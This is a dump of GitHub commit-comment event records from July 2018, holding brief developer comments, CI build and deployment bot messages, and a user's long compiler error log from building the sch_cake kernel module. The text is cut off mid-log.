{"id":"7968146536","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29714767,"position":null,"line":null,"path":null,"commit_id":"c2ccee1b61a585c5f4fca00da8f79cc1db37048b","created_at":"2018-07-15T23:38:13Z","updated_at":"2018-07-15T23:38:13Z","author_association":"NONE","body":"#457"}},"created_at":"2018-07-15T23:38:13Z"}
{"id":"7968147443","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29714769,"position":null,"line":null,"path":null,"commit_id":"c2ccee1b61a585c5f4fca00da8f79cc1db37048b","created_at":"2018-07-15T23:39:02Z","updated_at":"2018-07-15T23:39:02Z","author_association":"NONE","body":"#457"}},"created_at":"2018-07-15T23:39:02Z"}
{"id":"7968150244","type":"CommitCommentEvent","actor":{"login":"brayanlc"},"repo":{"name":"brayanlc/udemy-heroes"},"payload":{"comment":{"id":29714773,"position":null,"line":null,"path":null,"commit_id":"a7118774b80171abc44b40616a7af7b2857bc557","created_at":"2018-07-15T23:41:42Z","updated_at":"2018-07-15T23:41:42Z","author_association":"OWNER","body":"Perfecto!, los cambios funcionaron :+1: "}},"created_at":"2018-07-15T23:41:42Z"}
{"id":"7968150536","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"jakelauer/BaseballTheater"},"payload":{"comment":{"id":29714774,"position":null,"line":null,"path":null,"commit_id":"fa58de9b82db3eb931f764cabdb5afc4ba188ab2","created_at":"2018-07-15T23:41:59Z","updated_at":"2018-07-15T23:41:59Z","author_association":"NONE","body":"#fa68de9"}},"created_at":"2018-07-15T23:41:59Z"}
{"id":"7968152546","type":"CommitCommentEvent","actor":{"login":"warmfrost85"},"repo":{"name":"BeermotorWB/wrye-bash"},"payload":{"comment":{"id":29714777,"position":null,"line":null,"path":null,"commit_id":"2dd08b44baaf628ad2908289b12f177b5afbe9ed","created_at":"2018-07-15T23:43:44Z","updated_at":"2018-07-15T23:43:44Z","author_association":"NONE","body":"BeermotorWB, I'm glad \"frankenstein\" works for you. I've been using the extra Skyrim SE tags for a while now. How did people work before? :)"}},"created_at":"2018-07-15T23:43:44Z"}
{"id":"7968154748","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"jakelauer/BaseballTheater"},"payload":{"comment":{"id":29714786,"position":null,"line":null,"path":null,"commit_id":"63e2e3f2b246e1d29d6a0de1d9e6fd28fbbfda24","created_at":"2018-07-15T23:45:32Z","updated_at":"2018-07-15T23:45:32Z","author_association":"NONE","body":"#63r2r3f"}},"created_at":"2018-07-15T23:45:32Z"}
{"id":"7968160994","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"jakelauer/BaseballTheater"},"payload":{"comment":{"id":29714799,"position":null,"line":null,"path":null,"commit_id":"fa58de9b82db3eb931f764cabdb5afc4ba188ab2","created_at":"2018-07-15T23:50:54Z","updated_at":"2018-07-15T23:50:54Z","author_association":"NONE","body":"#fa58de9"}},"created_at":"2018-07-15T23:50:54Z"}
{"id":"7968162262","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714804,"position":null,"line":null,"path":null,"commit_id":"b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c","created_at":"2018-07-15T23:52:02Z","updated_at":"2018-07-15T23:52:02Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2321 of 2322 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 628\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.18%25-green.png)</a>\n"}},"created_at":"2018-07-15T23:52:02Z"}
{"id":"7968163148","type":"CommitCommentEvent","actor":{"login":"Cuntry"},"repo":{"name":"Cuntry/-TEMPLATE-"},"payload":{"comment":{"id":29714806,"position":42,"line":42,"path":".gitignore","commit_id":"f19e70eba5fa0e1d3bc4ae263776a2f565eeff27","created_at":"2018-07-15T23:52:52Z","updated_at":"2018-07-15T23:52:52Z","author_association":"OWNER","body":"(DETACH)(AWAY)(CACHE)"}},"created_at":"2018-07-15T23:52:52Z"}
{"id":"7968163756","type":"CommitCommentEvent","actor":{"login":"mezz"},"repo":{"name":"mezz/JustEnoughItems"},"payload":{"comment":{"id":29714809,"position":null,"line":null,"path":null,"commit_id":"c6e4329b8cf85df9c9a9719dc783a829f45e9e54","created_at":"2018-07-15T23:53:24Z","updated_at":"2018-07-15T23:53:24Z","author_association":"OWNER","body":"You can use this method to schedule some code to run on the main thread: `Minecraft#addScheduledTask()` "}},"created_at":"2018-07-15T23:53:24Z"}
{"id":"7968163846","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714810,"position":null,"line":null,"path":null,"commit_id":"b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c","created_at":"2018-07-15T23:53:29Z","updated_at":"2018-07-15T23:53:29Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T23:53:29Z"}
{"id":"7968166682","type":"CommitCommentEvent","actor":{"login":"zardyh"},"repo":{"name":"tmpim/luadash"},"payload":{"comment":{"id":29714818,"position":null,"line":null,"path":null,"commit_id":"589310feb2501ae2312ce75f38d93cc238a37915","created_at":"2018-07-15T23:56:06Z","updated_at":"2018-07-15T23:56:06Z","author_association":"COLLABORATOR","body":"RIP the red"}},"created_at":"2018-07-15T23:56:06Z"}
{"id":"7966708958","type":"CommitCommentEvent","actor":{"login":"scgakki"},"repo":{"name":"SCUTSSE/LR"},"payload":{"comment":{"id":29711197,"position":null,"line":null,"path":null,"commit_id":"db52a26deff5bc97900b8729ef7cc080282c415f","created_at":"2018-07-15T03:01:44Z","updated_at":"2018-07-15T03:01:44Z","author_association":"COLLABORATOR","body":"matrix.txt"}},"created_at":"2018-07-15T03:01:44Z"}
{"id":"7966709608","type":"CommitCommentEvent","actor":{"login":"Fan9"},"repo":{"name":"Fan9/tianchi_competition"},"payload":{"comment":{"id":29711198,"position":null,"line":null,"path":null,"commit_id":"21b3f1dd39b38886cf60baabd71d8f52640c5ed8","created_at":"2018-07-15T03:02:20Z","updated_at":"2018-07-15T03:02:20Z","author_association":"OWNER","body":"convert data to tfrecord format"}},"created_at":"2018-07-15T03:02:20Z"}
{"id":"7966710051","type":"CommitCommentEvent","actor":{"login":"scgakki"},"repo":{"name":"SCUTSSE/LR"},"payload":{"comment":{"id":29711199,"position":null,"line":null,"path":null,"commit_id":"db52a26deff5bc97900b8729ef7cc080282c415f","created_at":"2018-07-15T03:02:47Z","updated_at":"2018-07-15T03:02:47Z","author_association":"COLLABORATOR","body":"matrix.txt"}},"created_at":"2018-07-15T03:02:47Z"}
{"id":"7966711134","type":"CommitCommentEvent","actor":{"login":"jradwan"},"repo":{"name":"jradwan/TiVoToGo.bundle"},"payload":{"comment":{"id":29711202,"position":null,"line":null,"path":null,"commit_id":"183099052709f5ca2015e6ec71357cbb54b6f5b7","created_at":"2018-07-15T03:03:59Z","updated_at":"2018-07-15T03:03:59Z","author_association":"OWNER","body":"Suggested by @renegaudet."}},"created_at":"2018-07-15T03:03:59Z"}
{"id":"7966713179","type":"CommitCommentEvent","actor":{"login":"FDirectionClear"},"repo":{"name":"FDirectionClear/summertraining"},"payload":{"comment":{"id":29711208,"position":null,"line":null,"path":null,"commit_id":"06f514d1e4cc876ccdcb41a8981724e70a3005f3","created_at":"2018-07-15T03:06:14Z","updated_at":"2018-07-15T03:06:14Z","author_association":"OWNER","body":"这个地方记录每次上传文件的原因"}},"created_at":"2018-07-15T03:06:14Z"}
{"id":"7966713230","type":"CommitCommentEvent","actor":{"login":"mpmdean"},"repo":{"name":"scikit-beam/rixs"},"payload":{"comment":{"id":29711209,"position":null,"line":null,"path":null,"commit_id":"6180b623e3a8af5340d4a96cafae34c1aaff74d6","created_at":"2018-07-15T03:06:17Z","updated_at":"2018-07-15T03:06:17Z","author_association":"CONTRIBUTOR","body":"As I recall, it was a suggestion from Andrew. @pytest.fixture is a new thing for me. I thought this made the tests more efficient. I didn't have the text in the guide in mind especially. \r\n\r\nAt this stage, the tests run very fast, so keeping it simple will be nice and should help in stopping the entry barrier in understanding and developing the code from getting too high. "}},"created_at":"2018-07-15T03:06:17Z"}
{"id":"7966713848","type":"CommitCommentEvent","actor":{"login":"hackleberryfinn"},"repo":{"name":"hackleberryfinn/Global-Citizen-Hackleberry-Finn"},"payload":{"comment":{"id":29711211,"position":null,"line":null,"path":null,"commit_id":"1782fb224913ce7aeb2675f0094d73c29a36d1e5","created_at":"2018-07-15T03:06:59Z","updated_at":"2018-07-15T03:06:59Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/f3f56358-197d-4212-bb99-0d95d54bfc86?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/baf2eb90-00e5-408f-9f5d-d47769aab3be?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\") deployed [Global-Citizen-Hackleberry-Finn](https://github.com/hackleberryfinn/Global-Citizen-Hackleberry-Finn/releases/tag/deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180715-030658 \"deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180715-030658\") to [dev](https://console.bluemix.net/apps/8b984503-074c-42ab-b13c-92e494596da3?env_id=ibm:yp:us-south \"ibm:yp:us-south:luke.hutchinson@live.com.au:dev\"), including this commit"}},"created_at":"2018-07-15T03:06:59Z"}
{"id":"7966713903","type":"CommitCommentEvent","actor":{"login":"pshobha97"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29711212,"position":null,"line":null,"path":null,"commit_id":"d90780ed210b22b6da91a35f38fc33fc18ba5de5","created_at":"2018-07-15T03:07:04Z","updated_at":"2018-07-15T03:07:04Z","author_association":"NONE","body":"Where will I get notes"}},"created_at":"2018-07-15T03:07:04Z"}
{"id":"7966713931","type":"CommitCommentEvent","actor":{"login":"pshobha97"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29711214,"position":null,"line":null,"path":null,"commit_id":"d90780ed210b22b6da91a35f38fc33fc18ba5de5","created_at":"2018-07-15T03:07:06Z","updated_at":"2018-07-15T03:07:06Z","author_association":"NONE","body":"Where will I get notes"}},"created_at":"2018-07-15T03:07:06Z"}
{"id":"7966714385","type":"CommitCommentEvent","actor":{"login":"survient"},"repo":{"name":"dtaht/sch_cake"},"payload":{"comment":{"id":29711215,"position":null,"line":null,"path":null,"commit_id":"52cbc000aed8da9b3bd511fe7ffda7c8ae3a0eb0","created_at":"2018-07-15T03:07:38Z","updated_at":"2018-07-15T03:07:38Z","author_association":"NONE","body":"I am having issues compiling on Fedora 28 with this latest commit, the previous commit of 6cdb4962597e0da4d472dc11b1b88aeceac35635 works fine. Errors below:\r\n`\r\n$ make\r\nmake -C /lib/modules/4.17.3-200.fc28.x86_64/build SUBDIRS=/home/routeruser/sch_cake modules LDFLAGS_MODULE=\"--build-id=0x52cbc000aed8da9b3bd511fe7ffda7c8ae3a0eb0\" CFLAGS_MODULE=\"-DCAKE_VERSION=\\\\\\\"52cbc000aed8da9b3bd511fe7ffda7c8ae3a0eb0\\\\\\\"\"\r\nmake[1]: Entering directory '/usr/src/kernels/4.17.3-200.fc28.x86_64'\r\n  CC [M]  /home/routeruser/sch_cake/sch_cake.o\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_dsrc’:\r\n/home/routeruser/sch_cake/sch_cake.c:684:22: error: ‘CAKE_FLOW_DUAL_SRC’ undeclared (first use in this function); did you mean ‘CAKE_FLOW_MASK’?\r\n  return (flow_mode & CAKE_FLOW_DUAL_SRC) == CAKE_FLOW_DUAL_SRC;\r\n                      ^~~~~~~~~~~~~~~~~~\r\n                      CAKE_FLOW_MASK\r\n/home/routeruser/sch_cake/sch_cake.c:684:22: note: each undeclared identifier is reported only once for each function it appears in\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_ddst’:\r\n/home/routeruser/sch_cake/sch_cake.c:689:22: error: ‘CAKE_FLOW_DUAL_DST’ undeclared (first use in this function); did you mean ‘CAKE_FLOW_MASK’?\r\n  return (flow_mode & CAKE_FLOW_DUAL_DST) == CAKE_FLOW_DUAL_DST;\r\n                      ^~~~~~~~~~~~~~~~~~\r\n                      CAKE_FLOW_MASK\r\nIn file included from ./include/linux/kernel.h:10,\r\n                 from ./include/linux/list.h:9,\r\n                 from ./include/linux/module.h:9,\r\n                 from /home/routeruser/sch_cake/sch_cake.c:53:\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_hash’:\r\n/home/routeruser/sch_cake/sch_cake.c:703:28: error: ‘CAKE_FLOW_NONE’ undeclared (first use in this function); did you mean ‘CAKE_SET_NONE’?\r\n  if (unlikely(flow_mode == CAKE_FLOW_NONE))\r\n                            ^~~~~~~~~~~~~~\r\n./include/linux/compiler.h:77:42: note: in definition of macro ‘unlikely’\r\n # define unlikely(x) __builtin_expect(!!(x), 0)\r\n                                          ^\r\n/home/routeruser/sch_cake/sch_cake.c:773:18: error: ‘CAKE_FLOW_FLOWS’ undeclared (first use in this function); did you mean ‘CAKE_FLOW_MASK’?\r\n  if (flow_mode & CAKE_FLOW_FLOWS)\r\n                  ^~~~~~~~~~~~~~~\r\n                  CAKE_FLOW_MASK\r\n/home/routeruser/sch_cake/sch_cake.c:778:19: error: ‘CAKE_FLOW_SRC_IP’ undeclared (first use in this function); did you mean ‘CAKE_FLOW_MASK’?\r\n   if (flow_mode & CAKE_FLOW_SRC_IP)\r\n                   ^~~~~~~~~~~~~~~~\r\n                   CAKE_FLOW_MASK\r\n/home/routeruser/sch_cake/sch_cake.c:781:19: error: ‘CAKE_FLOW_DST_IP’ undeclared (first use in this function); did you mean ‘CAKE_FLOW_NAT_FLAG’?\r\n   if (flow_mode & CAKE_FLOW_DST_IP)\r\n                   ^~~~~~~~~~~~~~~~\r\n                   CAKE_FLOW_NAT_FLAG\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_ack_filter’:\r\n/home/routeruser/sch_cake/sch_cake.c:1193:37: error: ‘CAKE_ACK_AGGRESSIVE’ undeclared (first use in this function); did you mean ‘CAKE_FLAG_INGRESS’?\r\n  bool aggressive = q->ack_filter == CAKE_ACK_AGGRESSIVE;\r\n                                     ^~~~~~~~~~~~~~~~~~~\r\n                                     CAKE_FLAG_INGRESS\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_calc_overhead’:\r\n/home/routeruser/sch_cake/sch_cake.c:1367:21: error: ‘CAKE_ATM_ATM’ undeclared (first use in this function); did you mean ‘TCA_ATM_PTR’?\r\n  if (q->atm_mode == CAKE_ATM_ATM) {\r\n                     ^~~~~~~~~~~~\r\n                     TCA_ATM_PTR\r\n/home/routeruser/sch_cake/sch_cake.c:1371:28: error: ‘CAKE_ATM_PTM’ undeclared (first use in this function); did you mean ‘TCA_ATM_PTR’?\r\n  } else if (q->atm_mode == CAKE_ATM_PTM) {\r\n                            ^~~~~~~~~~~~\r\n                            TCA_ATM_PTR\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_select_tin’:\r\n/home/routeruser/sch_cake/sch_cake.c:1657:28: error: ‘CAKE_DIFFSERV_BESTEFFORT’ undeclared (first use in this function); did you mean ‘TC_PRIO_BESTEFFORT’?\r\n  } else if (q->tin_mode != CAKE_DIFFSERV_BESTEFFORT) {\r\n                            ^~~~~~~~~~~~~~~~~~~~~~~~\r\n                            TC_PRIO_BESTEFFORT\r\n/home/routeruser/sch_cake/sch_cake.c: At top level:\r\n/home/routeruser/sch_cake/sch_cake.c:2242:44: error: ‘TCA_CAKE_MAX’ undeclared here (not in a function); did you mean ‘TCA_CHOKE_MAX’?\r\n static const struct nla_policy cake_policy[TCA_CAKE_MAX + 1] = {\r\n                                            ^~~~~~~~~~~~\r\n                                            TCA_CHOKE_MAX\r\n/home/routeruser/sch_cake/sch_cake.c:2243:3: error: ‘TCA_CAKE_BASE_RATE64’ undeclared here (not in a function); did you mean ‘TCA_NETEM_RATE64’?\r\n  [TCA_CAKE_BASE_RATE64]   = { .type = NLA_U64 },\r\n   ^~~~~~~~~~~~~~~~~~~~\r\n   TCA_NETEM_RATE64\r\n/home/routeruser/sch_cake/sch_cake.c:2243:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2243:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2243:31: error: field name not in record or union initializer\r\n  [TCA_CAKE_BASE_RATE64]   = { .type = NLA_U64 },\r\n                               ^\r\n/home/routeruser/sch_cake/sch_cake.c:2243:31: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2244:3: error: ‘TCA_CAKE_DIFFSERV_MODE’ undeclared here (not in a function); did you mean ‘TCA_PIE_BYTEMODE’?\r\n  [TCA_CAKE_DIFFSERV_MODE] = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~~~~~~~~~~~\r\n   TCA_PIE_BYTEMODE\r\n/home/routeruser/sch_cake/sch_cake.c:2244:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2244:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2244:31: error: field name not in record or union initializer\r\n  [TCA_CAKE_DIFFSERV_MODE] = { .type = NLA_U32 },\r\n                               ^\r\n/home/routeruser/sch_cake/sch_cake.c:2244:31: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2245:3: error: ‘TCA_CAKE_ATM’ undeclared here (not in a function); did you mean ‘TCA_ATM_PTR’?\r\n  [TCA_CAKE_ATM]   = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~\r\n   TCA_ATM_PTR\r\n/home/routeruser/sch_cake/sch_cake.c:2245:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2245:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2245:23: error: field name not in record or union initializer\r\n  [TCA_CAKE_ATM]   = { .type = NLA_U32 },\r\n                       ^\r\n/home/routeruser/sch_cake/sch_cake.c:2245:23: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2246:3: error: ‘TCA_CAKE_FLOW_MODE’ undeclared here (not in a function); did you mean ‘TCA_FLOW_MODE’?\r\n  [TCA_CAKE_FLOW_MODE]     = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~~~~~~~\r\n   TCA_FLOW_MODE\r\n/home/routeruser/sch_cake/sch_cake.c:2246:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2246:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2246:31: error: field name not in record or union initializer\r\n  [TCA_CAKE_FLOW_MODE]     = { .type = NLA_U32 },\r\n                               ^\r\n/home/routeruser/sch_cake/sch_cake.c:2246:31: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2247:3: error: ‘TCA_CAKE_OVERHEAD’ undeclared here (not in a function); did you mean ‘CAKE_FLAG_OVERHEAD’?\r\n  [TCA_CAKE_OVERHEAD]      = { .type = NLA_S32 },\r\n   ^~~~~~~~~~~~~~~~~\r\n   CAKE_FLAG_OVERHEAD\r\n/home/routeruser/sch_cake/sch_cake.c:2247:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2247:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2247:31: error: field name not in record or union initializer\r\n  [TCA_CAKE_OVERHEAD]      = { .type = NLA_S32 },\r\n                               ^\r\n/home/routeruser/sch_cake/sch_cake.c:2247:31: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2248:3: error: ‘TCA_CAKE_RTT’ undeclared here (not in a function); did you mean ‘TCA_ATM_PTR’?\r\n  [TCA_CAKE_RTT]   = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~\r\n   TCA_ATM_PTR\r\n/home/routeruser/sch_cake/sch_cake.c:2248:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2248:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2248:23: error: field name not in record or union initializer\r\n  [TCA_CAKE_RTT]   = { .type = NLA_U32 },\r\n                       ^\r\n/home/routeruser/sch_cake/sch_cake.c:2248:23: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2249:3: error: ‘TCA_CAKE_TARGET’ undeclared here (not in a function); did you mean ‘TCA_PIE_TARGET’?\r\n  [TCA_CAKE_TARGET]  = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~~~~\r\n   TCA_PIE_TARGET\r\n/home/routeruser/sch_cake/sch_cake.c:2249:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2249:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2249:25: error: field name not in record or union initializer\r\n  [TCA_CAKE_TARGET]  = { .type = NLA_U32 },\r\n                         ^\r\n/home/routeruser/sch_cake/sch_cake.c:2249:25: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2250:3: error: ‘TCA_CAKE_AUTORATE’ undeclared here (not in a function); did you mean ‘TCA_PIE_TUPDATE’?\r\n  [TCA_CAKE_AUTORATE]      = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~~~~~~\r\n   TCA_PIE_TUPDATE\r\n/home/routeruser/sch_cake/sch_cake.c:2250:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2250:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2250:31: error: field name not in record or union initializer\r\n  [TCA_CAKE_AUTORATE]      = { .type = NLA_U32 },\r\n                               ^\r\n/home/routeruser/sch_cake/sch_cake.c:2250:31: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2251:3: error: ‘TCA_CAKE_MEMORY’ undeclared here (not in a function); did you mean ‘TCA_NETEM_CORR’?\r\n  [TCA_CAKE_MEMORY]  = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~~~~\r\n   TCA_NETEM_CORR\r\n/home/routeruser/sch_cake/sch_cake.c:2251:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2251:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2251:25: error: field name not in record or union initializer\r\n  [TCA_CAKE_MEMORY]  = { .type = NLA_U32 },\r\n                         ^\r\n/home/routeruser/sch_cake/sch_cake.c:2251:25: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2252:3: error: ‘TCA_CAKE_NAT’ undeclared here (not in a function); did you mean ‘TCA_CHOKE_MAX’?\r\n  [TCA_CAKE_NAT]   = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~\r\n   TCA_CHOKE_MAX\r\n/home/routeruser/sch_cake/sch_cake.c:2252:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2252:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2252:23: error: field name not in record or union initializer\r\n  [TCA_CAKE_NAT]   = { .type = NLA_U32 },\r\n                       ^\r\n/home/routeruser/sch_cake/sch_cake.c:2252:23: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2253:3: error: ‘TCA_CAKE_RAW’ undeclared here (not in a function); did you mean ‘TCA_CHOKE_MAX’?\r\n  [TCA_CAKE_RAW]   = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~\r\n   TCA_CHOKE_MAX\r\n/home/routeruser/sch_cake/sch_cake.c:2253:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2253:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2253:23: error: field name not in record or union initializer\r\n  [TCA_CAKE_RAW]   = { .type = NLA_U32 },\r\n                       ^\r\n/home/routeruser/sch_cake/sch_cake.c:2253:23: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2254:3: error: ‘TCA_CAKE_WASH’ undeclared here (not in a function); did you mean ‘TCA_U32_HASH’?\r\n  [TCA_CAKE_WASH]   = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~~\r\n   TCA_U32_HASH\r\n/home/routeruser/sch_cake/sch_cake.c:2254:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2254:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2254:24: error: field name not in record or union initializer\r\n  [TCA_CAKE_WASH]   = { .type = NLA_U32 },\r\n                        ^\r\n/home/routeruser/sch_cake/sch_cake.c:2254:24: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2255:3: error: ‘TCA_CAKE_MPU’ undeclared here (not in a function); did you mean ‘TCA_CHOKE_MAX’?\r\n  [TCA_CAKE_MPU]   = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~\r\n   TCA_CHOKE_MAX\r\n/home/routeruser/sch_cake/sch_cake.c:2255:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2255:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2255:23: error: field name not in record or union initializer\r\n  [TCA_CAKE_MPU]   = { .type = NLA_U32 },\r\n                       ^\r\n/home/routeruser/sch_cake/sch_cake.c:2255:23: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2256:3: error: ‘TCA_CAKE_INGRESS’ undeclared here (not in a function); did you mean ‘TCQ_F_INGRESS’?\r\n  [TCA_CAKE_INGRESS]  = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~~~~~\r\n   TCQ_F_INGRESS\r\n/home/routeruser/sch_cake/sch_cake.c:2256:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2256:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2256:26: error: field name not in record or union initializer\r\n  [TCA_CAKE_INGRESS]  = { .type = NLA_U32 },\r\n                          ^\r\n/home/routeruser/sch_cake/sch_cake.c:2256:26: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2257:3: error: ‘TCA_CAKE_ACK_FILTER’ undeclared here (not in a function); did you mean ‘SO_DETACH_FILTER’?\r\n  [TCA_CAKE_ACK_FILTER]  = { .type = NLA_U32 },\r\n   ^~~~~~~~~~~~~~~~~~~\r\n   SO_DETACH_FILTER\r\n/home/routeruser/sch_cake/sch_cake.c:2257:3: error: array index in initializer not of integer type\r\n/home/routeruser/sch_cake/sch_cake.c:2257:3: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c:2257:29: error: field name not in record or union initializer\r\n  [TCA_CAKE_ACK_FILTER]  = { .type = NLA_U32 },\r\n                             ^\r\n/home/routeruser/sch_cake/sch_cake.c:2257:29: note: (near initialization for ‘cake_policy’)\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_reconfigure’:\r\n/home/routeruser/sch_cake/sch_cake.c:2546:7: error: ‘CAKE_DIFFSERV_BESTEFFORT’ undeclared (first use in this function); did you mean ‘TC_PRIO_BESTEFFORT’?\r\n  case CAKE_DIFFSERV_BESTEFFORT:\r\n       ^~~~~~~~~~~~~~~~~~~~~~~~\r\n       TC_PRIO_BESTEFFORT\r\n/home/routeruser/sch_cake/sch_cake.c:2550:7: error: ‘CAKE_DIFFSERV_PRECEDENCE’ undeclared (first use in this function)\r\n  case CAKE_DIFFSERV_PRECEDENCE:\r\n       